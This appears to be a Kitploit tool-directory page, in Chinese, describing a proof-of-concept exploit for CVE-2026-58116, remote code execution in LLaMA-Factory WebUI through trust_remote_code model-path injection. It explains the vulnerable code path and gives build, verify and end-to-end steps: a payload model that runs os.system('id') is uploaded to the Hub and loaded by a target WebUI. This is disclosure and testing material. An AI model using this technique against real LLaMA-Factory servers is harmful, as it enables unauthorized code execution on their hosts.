Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection — CVE-2026-58116 的概念验证漏洞利用,演示了通过 trust_remote_code 模型路径注入在 LLaMA-Factory WebUI 中实现远程代码执行。包含载荷模型和验证脚本,用于授权安全测试。 | Kitploit
工具/GitHubGitHub/hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection
漏洞分析代码分析漏洞利用Web应用程序漏洞利用CTF论文与研究学习与教育Payload 开发

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
GitHub
hunt-benito/llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

llama-factory-webui-rce-cve-2026-58116-trust-remote-code-model-path-injection

CVE-2026-58116 的概念验证漏洞利用,演示了通过 trust_remote_code 模型路径注入在 LLaMA-Factory WebUI 中实现远程代码执行。包含载荷模型和验证脚本,用于授权安全测试。

查看仓库
152个月前尚未审核
分享

CVE-2026-58116 — LLaMA-Factory WebUI 通过 trust_remote_code 实现远程代码执行(RCE)

CVE-2026-58116(CVSS 9.8 严重)的概念验证:远程代码执行 发生在 LLaMA-Factory <= v0.9.5 中。

LLaMA-Factory WebUI 在加载模型时将 trust_remote_code=True 硬编码 (src/llamafactory/webui/chatter.py:139 和 runner.py:175,320)。 攻击者可控的“模型路径”字段未经验证便流入 AutoTokenizer.from_pretrained() / AutoModel.from_pretrained(),因此 Hugging Face transformers 库会从恶意模型仓库下载并 执行任意 Python 代码。

⚠️ 仅限教育用途

本 PoC 仅用于授权的安全测试和教育。其中包含的 payload 故意保持无害(它通过 id 打印主机侦察信息)。仅可 对您拥有或经授权测试的系统运行。未经明确许可,切勿 对基础设施部署恶意 payload。

目录

.
├── poc-model/
│   ├── config.json          # declares auto_map → attacker modules
│   ├── configuration_poc.py # payload: runs os.system("id ...") at config load
│   ├── modeling_poc.py      # minimal stub model class
│   └── __init__.py          # makes it an importable package
└── build_and_verify.py      # assemble + verify the sink in isolation

sink 的工作原理

transformers 会在加载任何权重之前实例化配置类,因此 PoCConfig.__init__ 中的 payload 在配置被读取时就会触发——无需 存在任何权重。这正是 LLaMA-Factory 通过 src/llamafactory/model/loader.py 所经过的路径:

def _get_init_kwargs(model_args):
    return {"trust_remote_code": model_args.trust_remote_code, ...}   # True (hardcoded)

def load_tokenizer(model_args):
    init_kwargs = _get_init_kwargs(model_args)
    tokenizer = AutoTokenizer.from_pretrained(model_args.model_name_or_path, **init_kwargs)

快速开始

在本地验证 sink(无需 WebUI——证明 WebUI 所违反的约定):

pip install transformers torch
python3 build_and_verify.py

预期输出——请注意,payload 横幅在配置加载期间出现:

[+] PoC model assembled at .../poc-model
[*] Loading config with trust_remote_code=True (this triggers the PoC)...
============================================================
[CVE-2026-58116 PoC] trust_remote_code payload executed!
  time      : 2026-07-02T...
  host      : gpu-host-01
  user      : hbuser
------------------------------------------------------------
uid=1000(hbuser) gid=1000(hbuser) groups=1000(hbuser)
============================================================
[+] Config loaded: PoCConfig (model_type=poc_model)

通过正在运行的 LLaMA-Factory WebUI 进行端到端验证:

  1. 将 PoC 模型上传到 Hub:
    huggingface-cli login
    python3 build_and_verify.py --upload your-user/llmfcty-poc
    
  2. 启动受影响的 LLaMA-Factory 面板:llamafactory-cli webui
  3. 打开 Chat 选项卡,将模型路径设置为 your-user/llmfcty-poc,点击加载模型。
  4. payload 将以 LLaMA-Factory 进程的身份在服务器上执行。

参考

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-58116
  • VulnCheck 公告:https://www.vulncheck.com/advisories/llama-factory-remote-code-execution-via-webui-model-path
  • 原始披露(h3nrrrych4u):https://gist.github.com/henrrrychau/08d76ec672f42136bbc1449c4f2973f8
下载工具